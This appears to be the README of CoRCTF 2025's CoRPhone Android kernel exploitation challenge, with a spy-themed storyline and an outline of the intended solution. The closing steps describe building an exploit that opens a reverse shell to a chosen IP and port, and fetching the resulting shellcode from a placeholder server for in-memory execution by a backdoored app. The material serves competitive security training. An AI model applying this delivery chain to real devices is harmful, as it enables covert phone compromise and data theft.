CoRPhone is an Android kernel exploitation challenge created for CoRCTF 2025. It simulates a scenario in which a kernel exploit is delivered as shellcode and executed in memory by an untrusted Android app.

Congratulations to Pumpkin (@u1f383) and Billy (@st424204) for the first and only solve!

John "Piccio" Paniccia is the world's most notorious pigeon trafficker.
His most prized asset is a rare albino pigeon named Artura, insured for $1,000,000.

Intelligence indicates that Paniccia plans to sell Artura within 48 hours. 
The Agency has successfully installed a backdoor on his smartphone, but we have hit a brick wall: 
the trafficker uses a CoRPhone Pro - the most secure mobile platform on the planet.

You are our last resort. Your mission is to fully compromise the device, gain kernel-level access,
exfiltrate the chat history, and locate the albino pigeon before it's too late.

Download the challenge archive from here and follow the instructions to build the Docker image and create a CoRPhone instance.

Additional files:

• vmlinux.tar.gz - Android kernel with debug symbols.

• debug-image.tar.gz - Optional Linux debug image to speed up initial vulnerability analysis and the early stages of exploit development. The kernel and system image differ from Android, so make sure your exploit works on the target device.

TBD. A TL;DR is provided in exploit.c.

Compile the exploit with cd exploit && ./build.sh <IP> <PORT>.

IP and PORT are the address and port where you want to receive the reverse shell connection.

The script compiles the binary using musl-gcc, converts the resulting ELF to shellcode using pwntools, and creates a file called sc.

Host this file on your server and download it from the backdoored app using: pwn https://<yourserver>/sc. The app will execute the shellcode in memory through JNI.